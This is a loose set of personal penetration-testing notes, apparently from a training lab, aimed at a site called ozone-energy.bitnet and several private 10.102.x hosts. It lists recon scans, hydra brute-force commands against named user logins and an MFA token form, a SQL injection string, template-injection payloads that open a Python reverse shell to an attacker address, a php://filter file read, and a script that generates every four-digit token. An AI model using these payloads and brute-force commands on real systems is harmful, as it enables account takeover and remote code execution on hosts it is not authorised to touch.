# random notes

wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ <http://ozone-energy.bitnet>

a

nmap -sV -p80 ozone-energy.bitnet

wapiti -u <http://ozone-energy.bitnet> -m all

dirb <http://ozone-energy.bitnet> /usr/share/wordlists/custom/ozone-wordlist.txt.

" or "1"="1

hydra -l wscarlett -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/\[LOGINPAGE]:username=^USER^\&password=^PASS^\&Login=Login:Invalid Password"

hydra -l jschmidt -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/login:username=^USER^\&password=^PASS^\&Login=Login:Invalid Username or Password"

{{x().\_module.\_\_builtins\_\_\['\_\_import\_\_']\('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((\\"x.x.x.x\\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[\\"/bin/sh\\", \\"-i\\"]);'")}}

{{5\*'5'}}

dirb <http://10.102.9.99> /usr/share/wordlists/custom/ozone-wordlist.txt

hydra -l admin -P /usr/share/wordlists/custom/ozone-wordlist.txt 10.102.9.99 http-form-post "/login:username=^USER^\&password=^PASS^\&Login=Login:Invalid Password"

{{ for x in ().**class**.**base**.**subclasses**() %}

{{x().\_module.\_\_builtins\_\_\['\_\_import\_\_']\('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((\\"10.102.7.0\\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[\\"/bin/sh\\", \\"-i\\"]);'")}}{% endfor }}

php\://filter/convert.base64-encode/resource=/token.txt

echo 'bGludXhoaW50LmNvbQo=' | base64 --decode

GET /auth?user=YWRtaW4%3D\&token=dHJ1ZQ%3D%3D\&rememberMe=False HTTP/1.1

hydra -l admin -P /home/kali/generate.txt 10.102.11.237 http-form-post "/prompt:mfa\_token=^password\&Login=Login:Invalid token, please try again."

hydra -l admin -P /home/kali/Downloads/list3.txt 10.102.11.237 http-form-post "/prompt:username=^USER^\&mfa\_token=^PASS^\&Login=Login:Invalid token, please try again."

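#######################################
# Print every integer from 0 to 9999 as a zero-padded
# four-digit decimal, one per line (0000 … 9999).
# The original one-liner had no statement separators between
# `i=0`, the `while` header, `printf`, the increment and `done`,
# so the shell could not parse it; it is written out here one
# statement per line with the counter kept local.
# Globals:   none
# Arguments: none
# Outputs:   10000 lines on stdout
# Returns:   0
#######################################
print_padded_range() {
  local -r last=9999
  local i=0
  while (( i <= last )); do
    printf '%04d\n' "$i"
    i=$(( i + 1 ))
  done
}
print_padded_range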

Look at the host, not just the webapp: identify the web server platform; are there admin portals? \
Look for dangerous http methods - PUT, COPY, DELETE, TRACE \
are they vulnerable to directory traversal, shellshock \
use nmap to check ports
